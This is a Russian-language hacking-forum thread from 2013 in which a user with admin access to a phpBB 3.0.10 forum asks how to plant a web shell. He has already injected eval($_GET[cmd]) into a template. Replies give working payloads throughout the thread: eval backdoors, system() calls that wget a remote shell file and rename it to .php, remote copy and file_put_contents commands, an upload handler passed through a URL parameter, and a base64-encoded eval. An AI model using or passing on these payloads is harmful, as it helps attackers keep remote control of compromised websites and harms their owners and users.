ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   phpBB 3.0.10 Помогите залить шелл (https://forum.antichat.xyz/showthread.php?t=378363)

Hapk 29.03.2013 16:33

В общем есть доступ в админку

пробую залить шелл через правку шаблона

вставляю код eval($_GET[cmd]);

проверяю site.ru/forum/index.php?cmd=phpinfo(); - Работает

А вот когда пытаюсь залить шелл он почему то не заливается

делаю вот так site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...ничку
подскажите как ещё я могу залить шелл

OxoTnik 29.03.2013 16:45

Цитата:

Сообщение от None
site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...me/sait.ru/www; mv wso.txt wso.php");

[/QUOTE]

[/QUOTE]

Evil_Genius 29.03.2013 16:46

Попробуй так:

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php

Hapk 29.03.2013 16:55

Цитата:

Сообщение от OxoTnik
Скажи, а нахрена тебе эта порнография ?
давай по простому
Или так

да просто всегда так заливал!

copy("http://сайт/wso.txt","2.php"); - не работает

file_put_contents('2.php', file_get_contents('http://сайт/wso.txt')); - не работает

и это тоже не работает

?cmd=system("cd /home/sait.ru/www; wget http://сайт/wso.txt");

далее

?cmd=system("cd /home/sait.ru/www; mv wso.txt wso.php");

OxoTnik 29.03.2013 16:59

eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??

Да быть такого не может чтобы через wget не заливалось...

Hapk 29.03.2013 16:59

Цитата:

Сообщение от Evil_Genius
Попробуй так:
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php

Не много тебя не до понял

site.ru/forum/название_закачиваемого_фай ла.php

а где мне название это написать?

Evil_Genius 29.03.2013 17:00

Цитата:

Сообщение от Hapk
Не много тебя не до понял
site.ru/forum/название_закачиваемого_фай ла.php
а где мне название это написать?

закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php

Hapk 29.03.2013 17:03

Цитата:

Сообщение от OxoTnik
eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??
Да быть такого не может чтобы через
wget
не заливалось...

Так тоже не работает((

OxoTnik 29.03.2013 17:05

Цитата:

Сообщение от Hapk
Так тоже не работает((

так ты запрос изменил под себя я надеюсь ?

Если что в личку кинь, посмотрю

Hapk 29.03.2013 17:08

Цитата:

Сообщение от Evil_Genius
закачиваешь файл под названием file.php - у тебя такое и буде название site.ru/forum/file.php

я когда вот так делаю

site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

у меня нечего не происходит


Время: 21:39